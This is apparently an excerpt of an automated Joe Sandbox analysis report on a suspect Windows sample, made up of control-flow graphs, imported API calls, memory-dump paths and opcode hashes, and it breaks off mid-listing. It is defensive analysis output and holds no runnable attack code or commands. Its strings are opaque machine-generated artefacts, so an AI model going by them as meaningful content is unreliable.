                                                                                                • Instruction ID: beb4aae83fa4fc4a7d9d90903ab1f643bd74f2964bfb2f3d9b4a4f3e8bc4f97f
                                                                                                • Opcode Fuzzy Hash: 374bd608dc4599ebdb8a8d5c41f11362a84e9473b23c61c6aa332ac89d1c44dc
                                                                                                • Instruction Fuzzy Hash: DA41E2B0C0061DCBDB24DFA9C844B9DFBF6BF49304F20806AD408AB255DBB5A946CF91

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 491 275cf78-275d73c DuplicateHandle 494 275d745-275d762 491->494 495 275d73e-275d744 491->495 495->494
                                                                                                APIs
                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0275D66E,?,?,?,?,?), ref: 0275D72F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2529476001.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2750000_VJQyKuHEUe.jbxd
                                                                                                Similarity
                                                                                                • API ID: DuplicateHandle
                                                                                                • String ID:
                                                                                                • API String ID: 3793708945-0
                                                                                                • Opcode ID: 28a3960c189ae972de4447a5e77742b2c2d5cd49faf7281cc0d419bec768e330
                                                                                                • Instruction ID: 52bf21ac91f62bd5428d1c3f1521f3e85b851a7e842687b32f1d8774d465b9d5
                                                                                                • Opcode Fuzzy Hash: 28a3960c189ae972de4447a5e77742b2c2d5cd49faf7281cc0d419bec768e330
                                                                                                • Instruction Fuzzy Hash: 1F21E3B59002599FDB10DF9AD584AEEFBF8EB48310F14841AE918A3310D778A944CFA5

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 498 275d6a0-275d6a6 499 275d6ac-275d73c DuplicateHandle 498->499 500 275d745-275d762 499->500 501 275d73e-275d744 499->501 501->500
                                                                                                APIs
                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0275D66E,?,?,?,?,?), ref: 0275D72F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2529476001.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2750000_VJQyKuHEUe.jbxd
                                                                                                Similarity
                                                                                                • API ID: DuplicateHandle
                                                                                                • String ID:
                                                                                                • API String ID: 3793708945-0
                                                                                                • Opcode ID: 221938aad965a1fcb2d15c99a7cd17bc700026e72770eb7e4133ded450386055
                                                                                                • Instruction ID: a1cc5bfd578fa027f4f3a22a02abe5ad094960bbaf8b8b1bd94557c16c078fce
                                                                                                • Opcode Fuzzy Hash: 221938aad965a1fcb2d15c99a7cd17bc700026e72770eb7e4133ded450386055
                                                                                                • Instruction Fuzzy Hash: 5B21E0B59002599FDB10CFA9D584AEEFBF4EB48310F14841AE918A3350D378A944CFA5

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 504 2759cc8-2759d24 506 2759d26-2759d4e KiUserCallbackDispatcher 504->506 507 2759d72-2759d8b 504->507 508 2759d57-2759d6b 506->508 509 2759d50-2759d56 506->509 508->507 509->508
                                                                                                APIs
                                                                                                • KiUserCallbackDispatcher.NTDLL(0000004B), ref: 02759D3D
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2529476001.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2750000_VJQyKuHEUe.jbxd
                                                                                                Similarity
                                                                                                • API ID: CallbackDispatcherUser
                                                                                                • String ID:
                                                                                                • API String ID: 2492992576-0
                                                                                                • Opcode ID: 438892428abb52ef8e621c8a3057cb333f0a19ff5c97a8730722efbdf6e385a8
                                                                                                • Instruction ID: 458bad52dcfec1b7db49110b775bcfdb29447a887edfc7259313a3ff42dd233f
                                                                                                • Opcode Fuzzy Hash: 438892428abb52ef8e621c8a3057cb333f0a19ff5c97a8730722efbdf6e385a8
                                                                                                • Instruction Fuzzy Hash: F421DFB1804388DEDB11DFAAD4047DEBFF4EB06314F144099D998A7296C378AA44CBB1

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 511 275ab94-275b400 514 275b402-275b405 511->514 515 275b408-275b433 GetModuleHandleW 511->515 514->515 516 275b435-275b43b 515->516 517 275b43c-275b450 515->517 516->517
                                                                                                APIs
                                                                                                • GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?,?,0275B1EC), ref: 0275B426
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2529476001.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2750000_VJQyKuHEUe.jbxd
                                                                                                Similarity
                                                                                                • API ID: HandleModule
                                                                                                • String ID:
                                                                                                • API String ID: 4139908857-0
                                                                                                • Opcode ID: 5b90e5216635ce3ccc1ba7168d90fc98e5ef3f55880b13f88ffc29b575954d97
                                                                                                • Instruction ID: 14a6fe7682da101bcd88130b053c5bdc9732ed1f9ed25b97eebd548d564fdb69
                                                                                                • Opcode Fuzzy Hash: 5b90e5216635ce3ccc1ba7168d90fc98e5ef3f55880b13f88ffc29b575954d97
                                                                                                • Instruction Fuzzy Hash: 5811F0B58002598BDB20DF9AC444BAEFBF4EF89314F10946AD819B7210D3B9A545CFA1

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 519 2759cd8-2759d24 521 2759d26-2759d4e KiUserCallbackDispatcher 519->521 522 2759d72-2759d8b 519->522 523 2759d57-2759d6b 521->523 524 2759d50-2759d56 521->524 523->522 524->523
                                                                                                APIs
                                                                                                • KiUserCallbackDispatcher.NTDLL(0000004B), ref: 02759D3D
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2529476001.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2750000_VJQyKuHEUe.jbxd
                                                                                                Similarity
                                                                                                • API ID: CallbackDispatcherUser
                                                                                                • String ID:
                                                                                                • API String ID: 2492992576-0
                                                                                                • Opcode ID: 6fe3512e82415820c32d649a668e4d376987bd9933cade7b8595188f7099bccf
                                                                                                • Instruction ID: 1e447be8999975defc3d2d3c6526c4c7d3bf8c5c3a6f76a3f4eda30d12ea3928
                                                                                                • Opcode Fuzzy Hash: 6fe3512e82415820c32d649a668e4d376987bd9933cade7b8595188f7099bccf
                                                                                                • Instruction Fuzzy Hash: 9E119DB1800398DEDB10DF9AD5047EEBFF8EB05315F144099D958A3245C37DAA44CBB1

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 526 9370040-93700aa PostMessageW 527 93700b3-93700c7 526->527 528 93700ac-93700b2 526->528 528->527
                                                                                                APIs
                                                                                                • PostMessageW.USER32(?,?,?,?), ref: 0937009D
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2548359781.0000000009370000.00000040.00000800.00020000.00000000.sdmp, Offset: 09370000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_9370000_VJQyKuHEUe.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessagePost
                                                                                                • String ID:
                                                                                                • API String ID: 410705778-0
                                                                                                • Opcode ID: 98c2c096928fb07c8f6644e06d29a2dbd55b038ff150b9b1148625363f2cd5f9
                                                                                                • Instruction ID: 8b71109c594b2f43c21865517318d6b2cb2fbd51fd4a67465c4069b4db3115b0
                                                                                                • Opcode Fuzzy Hash: 98c2c096928fb07c8f6644e06d29a2dbd55b038ff150b9b1148625363f2cd5f9
                                                                                                • Instruction Fuzzy Hash: F511D3B58003499FDB20DF9AD945BDEFBF8EB48320F108419E958A7250C379A544CFA1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2529162116.0000000000F5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F5D000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_f5d000_VJQyKuHEUe.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 043f2398de365950bdb4305912976b5c5dde7b01bbf8f9c04b3631fbc53c6b1c
                                                                                                • Instruction ID: a83445827f5eeb34a198fc17a7c9b8f93b59aee508788969539edd06eff53c95
                                                                                                • Opcode Fuzzy Hash: 043f2398de365950bdb4305912976b5c5dde7b01bbf8f9c04b3631fbc53c6b1c
                                                                                                • Instruction Fuzzy Hash: CB212571905204DFDB25DF14C9C0B26BB65FB84325F20C56DDE094B252C33AD84AEA61
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2529162116.0000000000F5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F5D000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_f5d000_VJQyKuHEUe.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 64fed43b41eeb17a060cf92ce7281ea6020bcf8d888225618d1fd557bf96e58c
                                                                                                • Instruction ID: a170a27bc4efaeaf7a065c2e9666bea622809fcb4ff27f41d42c60597ce72354
                                                                                                • Opcode Fuzzy Hash: 64fed43b41eeb17a060cf92ce7281ea6020bcf8d888225618d1fd557bf96e58c
                                                                                                • Instruction Fuzzy Hash: DF21F571505204DFDB24DF24D5C4B16BF65FB84325F20C569DE0A4B39AC33AD80BEA62
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2529162116.0000000000F5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F5D000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_f5d000_VJQyKuHEUe.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 53864572b7c61133590019717d56551bd8b4971df2f0885abe01d75578af1056
                                                                                                • Instruction ID: 95f8faeeb420eb55686aec3206f8cef259fe31dfa18ec9fe40ae68f67f0a85fa
                                                                                                • Opcode Fuzzy Hash: 53864572b7c61133590019717d56551bd8b4971df2f0885abe01d75578af1056
                                                                                                • Instruction Fuzzy Hash: C9219F755093C08FDB12CF24D994715BF71EB46324F28C5EAD9498F2A7C33A980ADB62
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2529162116.0000000000F5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F5D000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_f5d000_VJQyKuHEUe.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                                                                • Instruction ID: 6d961f8d6138e1a55f29e8286dbcd58305b014674720062d2fc0364ce22f7e20
                                                                                                • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                                                                • Instruction Fuzzy Hash: 8311BB75904280DFCB16CF10C9C4B15BBA1FB84324F24C6ADDD494B696C33AD84ADB62
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2529476001.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2750000_VJQyKuHEUe.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 124681e02c1d4b0443c16c39b7cdf3602f6e6e9d17057fc096b5f31c0a846bac
                                                                                                • Instruction ID: cb61a8c3803281642d3a2f443a8c0a867134c04b8181cffecc5ae42d22eb20b7
                                                                                                • Opcode Fuzzy Hash: 124681e02c1d4b0443c16c39b7cdf3602f6e6e9d17057fc096b5f31c0a846bac
                                                                                                • Instruction Fuzzy Hash: 22A15C32A002258FCF09DFB5C84459EB7B2FF85300B25456AED05AB265DBB5EA55CB80

                                                                                                Execution Graph

                                                                                                Execution Coverage:0.4%
                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                Signature Coverage:0.5%
                                                                                                Total number of Nodes:204
                                                                                                Total number of Limit Nodes:5
                                                                                                execution_graph 53007 7ff8b90e1430 53010 7ff8b90f9d90 53007->53010 53009 7ff8b90e1450 _onexit 53011 7ff8b90f9db3 53010->53011 53014 7ff8b90fa300 53011->53014 53013 7ff8b90f9e02 53013->53009 53035 7ff8b90ed0a0 53014->53035 53019 7ff8b90fa34e 53021 7ff8b90fa35b 53019->53021 53046 7ff8b90f1ae0 _lock_locales _unlock_locales tidy_global 53019->53046 53020 7ff8b90fa36b 53047 7ff8b90ef050 terminate SwitchToThread SetLastError std::_Throw_Cpp_error 53020->53047 53021->53013 53024 7ff8b90fa39d 53048 7ff8b90eb000 22 API calls std::system_error::system_error 53024->53048 53026 7ff8b90fa3ad _CxxThrowException 53027 7ff8b90fa3fb 53026->53027 53031 7ff8b90fa40b 53026->53031 53049 7ff8b912caa0 8 API calls 2 library calls 53027->53049 53029 7ff8b90fa549 53029->53013 53030 7ff8b90fa48b fputwc 53030->53027 53031->53027 53032 7ff8b90fa488 53031->53032 53033 7ff8b90fa4fe 53031->53033 53032->53027 53032->53030 53033->53027 53034 7ff8b90fa50b fwrite 53033->53034 53034->53027 53050 7ff8b90ed650 53035->53050 53037 7ff8b90ed0ea 53064 7ff8b912cac4 53037->53064 53040 7ff8b90ed103 53042 7ff8b90fad30 53040->53042 53043 7ff8b90fad63 53042->53043 53080 7ff8b90f9bac 53043->53080 53046->53021 53047->53024 53048->53026 53049->53029 53051 7ff8b90ed663 53050->53051 53052 7ff8b90ed669 53050->53052 53051->53037 53074 7ff8b90ef050 terminate SwitchToThread SetLastError std::_Throw_Cpp_error 53052->53074 53054 7ff8b90ed699 53075 7ff8b90eb000 22 API calls std::system_error::system_error 53054->53075 53056 7ff8b90ed6a9 _CxxThrowException 53058 7ff8b90ed6c0 53056->53058 53057 7ff8b90ed6e0 _CxxThrowException 53059 7ff8b90ed6ea 53057->53059 53058->53037 53058->53057 53058->53059 53076 7ff8b90ef050 terminate SwitchToThread SetLastError std::_Throw_Cpp_error 53059->53076 53061 7ff8b90ed71a 53077 7ff8b90eb000 22 API calls std::system_error::system_error 53061->53077 53063 7ff8b90ed72a _CxxThrowException 53065 7ff8b912cade malloc 53064->53065 53066 7ff8b90ed0f4 53065->53066 53067 7ff8b912cacf 53065->53067 53066->53040 53073 7ff8b90f8360 11 API calls 4 library calls 53066->53073 53067->53065 53068 7ff8b912caee 53067->53068 53069 7ff8b912caf9 53068->53069 53078 7ff8b9116410 _CxxThrowException std::bad_alloc::bad_alloc 53068->53078 53079 7ff8b912d650 _CxxThrowException free std::bad_alloc::bad_alloc 53069->53079 53073->53040 53074->53054 53075->53056 53076->53061 53077->53063 53096 7ff8b9115920 53080->53096 53082 7ff8b90f9bd1 53083 7ff8b9115920 tidy_global _lock_locales 53082->53083 53089 7ff8b90f9c20 std::locale::_Locimp::_Makeushloc 53082->53089 53084 7ff8b90f9bf6 53083->53084 53113 7ff8b91159d0 _unlock_locales 53084->53113 53085 7ff8b90f9c68 53115 7ff8b91159d0 _unlock_locales 53085->53115 53088 7ff8b90f9cb3 53088->53019 53088->53020 53089->53085 53099 7ff8b90ec9f0 53089->53099 53092 7ff8b90f9cc3 std::bad_alloc::bad_alloc 53095 7ff8b90f9ccd _CxxThrowException 53092->53095 53093 7ff8b90f9c80 53114 7ff8b90f8310 _CxxThrowException malloc _CxxThrowException free stdext::threads::_Mtx_new 53093->53114 53097 7ff8b911592f _lock_locales 53096->53097 53098 7ff8b9115937 53096->53098 53097->53098 53098->53082 53100 7ff8b90ecae2 53099->53100 53101 7ff8b90eca28 53099->53101 53100->53092 53100->53093 53101->53100 53102 7ff8b912cac4 stdext::threads::_Mtx_new 4 API calls 53101->53102 53103 7ff8b90eca39 53102->53103 53104 7ff8b90ecacd 53103->53104 53105 7ff8b90eca56 53103->53105 53104->53100 53116 7ff8b90eb560 53104->53116 53131 7ff8b90eace0 8 API calls 3 library calls 53105->53131 53108 7ff8b90eca76 53132 7ff8b90e1950 6 API calls 53108->53132 53110 7ff8b90eca93 53133 7ff8b90e74a0 ___lc_codepage_func ___mb_cur_max_func ___lc_locale_name_func __pctype_func 53110->53133 53112 7ff8b90ecaac 53112->53104 53113->53089 53114->53085 53115->53088 53134 7ff8b90f8510 53116->53134 53119 7ff8b90eb581 free 53120 7ff8b90eb588 53119->53120 53121 7ff8b90eb596 free 53120->53121 53122 7ff8b90eb59d 53120->53122 53121->53122 53123 7ff8b90eb5b2 53122->53123 53124 7ff8b90eb5ab free 53122->53124 53125 7ff8b90eb5c7 53123->53125 53126 7ff8b90eb5c0 free 53123->53126 53124->53123 53127 7ff8b90eb5d5 free 53125->53127 53128 7ff8b90eb5dc 53125->53128 53126->53125 53127->53128 53129 7ff8b90eb5f1 53128->53129 53130 7ff8b90eb5ea free 53128->53130 53130->53129 53131->53108 53132->53110 53133->53112 53135 7ff8b90eb577 53134->53135 53136 7ff8b90f851d setlocale 53134->53136 53135->53119 53135->53120 53136->53135 53137 7ff7f96ff3d0 53155 7ff7f96e79c0 53137->53155 53141 7ff7f96ff412 53142 7ff7f96e7770 3 API calls 53141->53142 53143 7ff7f96ff422 53142->53143 53206 7ff7f96e7330 cef_string_map_alloc cef_string_map_alloc malloc _CxxThrowException 53143->53206 53145 7ff7f96ff42a 53146 7ff7f96ff48f cef_string_map_alloc 53145->53146 53151 7ff7f96ff42e 53145->53151 53207 7ff7f96ff260 53145->53207 53226 7ff7f96ffaa0 malloc _CxxThrowException new 53146->53226 53149 7ff7f96ff48d 53149->53146 53150 7ff7f96ff43e 53150->53146 53150->53149 53153 7ff7f96ff459 53150->53153 53154 7ff7f96ff46b Sleep 53153->53154 53225 7ff7f96ffaa0 malloc _CxxThrowException new 53153->53225 53154->53149 53154->53150 53227 7ff7f96e2520 53155->53227 53160 7ff7f96e7a75 53262 7ff7f96e37e0 cef_string_map_alloc cef_string_map_alloc malloc _CxxThrowException new 53160->53262 53161 7ff7f96e7a9f 53162 7ff7f96e7ac8 53161->53162 53163 7ff7f96e7ab3 cef_string_map_alloc 53161->53163 53164 7ff7f96e2520 25 API calls 53162->53164 53163->53162 53165 7ff7f96e7ad8 malloc 53164->53165 53167 7ff7f96e5010 3 API calls 53165->53167 53168 7ff7f96e7b3e 53167->53168 53169 7ff7f96e7b73 free 53168->53169 53170 7ff7f96e7b7b 53168->53170 53169->53170 53171 7ff7f96e7ba2 53170->53171 53176 7ff7f96e7bc7 53170->53176 53263 7ff7f96e4ec0 cef_string_map_alloc cef_string_map_alloc malloc _CxxThrowException 53171->53263 53173 7ff7f96e7bbb 53174 7ff7f96e7c32 53173->53174 53177 7ff7f96e7c1d cef_string_map_alloc 53173->53177 53248 7ff7f97a3d44 53174->53248 53176->53173 53264 7ff7f96e37e0 cef_string_map_alloc cef_string_map_alloc malloc _CxxThrowException new 53176->53264 53177->53174 53180 7ff7f96e2520 25 API calls 53181 7ff7f96e7c9d 53180->53181 53265 7ff7f96e37e0 cef_string_map_alloc cef_string_map_alloc malloc _CxxThrowException new 53181->53265 53182 7ff7f96e7d2d 53183 7ff7f96e7d5e 53182->53183 53184 7ff7f96e7d49 cef_string_map_alloc 53182->53184 53186 7ff7f96e7d75 free 53183->53186 53187 7ff7f96e7d7f 53183->53187 53184->53183 53186->53187 53190 7ff7f96e7770 3 API calls 53187->53190 53189 7ff7f96e7ce5 53266 7ff7f96e22b0 memmove memcpy malloc memcpy free 53189->53266 53194 7ff7f96e7db1 53190->53194 53192 7ff7f96e7d09 53267 7ff7f96e4bb0 malloc cef_string_map_alloc malloc _CxxThrowException 53192->53267 53196 7ff7f96e7e21 53194->53196 53197 7ff7f96e7e18 free 53194->53197 53195 7ff7f96e7d2a 53195->53182 53253 7ff7f97a3d20 53196->53253 53197->53196 53200 7ff7f96e7770 53201 7ff7f96e778f 53200->53201 53205 7ff7f96e77b0 53200->53205 53202 7ff7f97a3d44 new 2 API calls 53201->53202 53203 7ff7f96e7799 53202->53203 53203->53205 53273 7ff7f96e5310 memset malloc _CxxThrowException new 53203->53273 53205->53141 53206->53145 53208 7ff7f96ff29d 53207->53208 53278 7ff7f96e18f0 45 API calls 53208->53278 53210 7ff7f96ff2cd 53274 7ff7f96e1890 7 API calls 53210->53274 53212 7ff7f96ff31c 53213 7ff7f96ff331 free 53212->53213 53214 7ff7f96ff33b 53212->53214 53213->53214 53224 7ff7f96ff33f 53214->53224 53275 7ff7f974de70 53214->53275 53216 7ff7f96ff355 SetEvent CloseHandle 53216->53224 53217 7ff7f96ff391 free 53218 7ff7f96ff39b 53217->53218 53279 7ff7f96e1840 free free free free 53218->53279 53221 7ff7f96ff3a4 53222 7ff7f97a3d20 8 API calls 53221->53222 53223 7ff7f96ff3b4 53222->53223 53223->53150 53224->53217 53224->53218 53225->53153 53226->53151 53228 7ff7f96e25f7 53227->53228 53229 7ff7f96e255f 53227->53229 53230 7ff7f97a3d20 8 API calls 53228->53230 53268 7ff7f96e3130 12 API calls 53229->53268 53232 7ff7f96e260f malloc 53230->53232 53243 7ff7f96e5010 53232->53243 53233 7ff7f96e2594 53269 7ff7f96e2a90 cef_string_map_alloc malloc _CxxThrowException new 53233->53269 53235 7ff7f96e25a2 53235->53228 53236 7ff7f96e25c3 _invalid_parameter_noinfo_noreturn 53235->53236 53237 7ff7f96e25ca 53235->53237 53236->53237 53238 7ff7f96e25d3 _invalid_parameter_noinfo_noreturn 53237->53238 53239 7ff7f96e25da 53237->53239 53238->53239 53240 7ff7f96e25e3 _invalid_parameter_noinfo_noreturn 53239->53240 53241 7ff7f96e25ea 53239->53241 53240->53241 53241->53228 53242 7ff7f96e25f0 _invalid_parameter_noinfo_noreturn 53241->53242 53242->53228 53244 7ff7f96e50d7 free 53243->53244 53245 7ff7f96e5037 53243->53245 53244->53160 53244->53161 53245->53244 53246 7ff7f97a3d44 new 2 API calls 53245->53246 53247 7ff7f96e5099 cef_string_map_alloc 53246->53247 53247->53245 53249 7ff7f97a3d70 malloc 53248->53249 53250 7ff7f96e7c3c 53249->53250 53251 7ff7f97a3d4f Concurrency::cancel_current_task 53249->53251 53250->53180 53250->53182 53251->53249 53270 7ff7f97a4ccc _CxxThrowException std::bad_alloc::bad_alloc 53251->53270 53254 7ff7f97a3d2a 53253->53254 53255 7ff7f96e7e2d SetConsoleCtrlHandler GetModuleHandleW 53254->53255 53256 7ff7f97a4420 IsProcessorFeaturePresent 53254->53256 53255->53200 53257 7ff7f97a4437 53256->53257 53271 7ff7f97a4614 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 53257->53271 53259 7ff7f97a444a 53272 7ff7f97a43ec SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 53259->53272 53262->53161 53263->53173 53264->53173 53265->53189 53266->53192 53267->53195 53268->53233 53269->53235 53270->53251 53271->53259 53273->53205 53274->53212 53276 7ff7f97a3d44 new 2 API calls 53275->53276 53277 7ff7f974de9c 53276->53277 53277->53216 53278->53210 53279->53221

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: Initstd::ios_base::_$AddstdExceptionThrowfputwcfwritestd::ios_base::failure::failurestd::locale::_
                                                                                                • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                • API String ID: 247381371-1866435925
                                                                                                • Opcode ID: 35a38cbc79ebcab4b9ad5f99447ef1bcd6ff45df82ca40ad9567068bb31a2069
                                                                                                • Instruction ID: b6f7de4768affe16859699a71e4fd12e962b28ff7ba6dc9d047b9c904a2326cd
                                                                                                • Opcode Fuzzy Hash: 35a38cbc79ebcab4b9ad5f99447ef1bcd6ff45df82ca40ad9567068bb31a2069
                                                                                                • Instruction Fuzzy Hash: 7F717B62618A86D9EF10CF69E4503A933A0FB84BC8F954032EB4D87B54EF3DE656D300

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: free$setlocale
                                                                                                • String ID:
                                                                                                • API String ID: 294139027-0
                                                                                                • Opcode ID: 33854c43b5f3c28a57ffc5b189671f457a919127f309d7183e95e5e4e4349629
                                                                                                • Instruction ID: a099397a9bd2c3935e8c1e289f17ef55bdbefea8fa41976adbd0ee5892e783ab
                                                                                                • Opcode Fuzzy Hash: 33854c43b5f3c28a57ffc5b189671f457a919127f309d7183e95e5e4e4349629
                                                                                                • Instruction Fuzzy Hash: 78112E27A1AB8181EF149FB9D4A43392360EF49FB9F141634CB2F55194CF2CD485D380

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExceptionFacet_RegisterThrow_lock_localesctypestd::_std::bad_alloc::bad_alloc
                                                                                                • String ID:
                                                                                                • API String ID: 2716750221-0
                                                                                                • Opcode ID: f00470ad906fe360da248e588a27599a9484419fa2c40968de4492c9eddb5e12
                                                                                                • Instruction ID: de5ee640f8aee4fe17ca603fe92df7ed834a828a05202b0f2ef9526065b462b6
                                                                                                • Opcode Fuzzy Hash: f00470ad906fe360da248e588a27599a9484419fa2c40968de4492c9eddb5e12
                                                                                                • Instruction Fuzzy Hash: D631AB62A0CA86D1EE109F2DE4601B977A0FB84BE0F584232DB6D037E6DE3CE5469340

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                Memory Dump Source
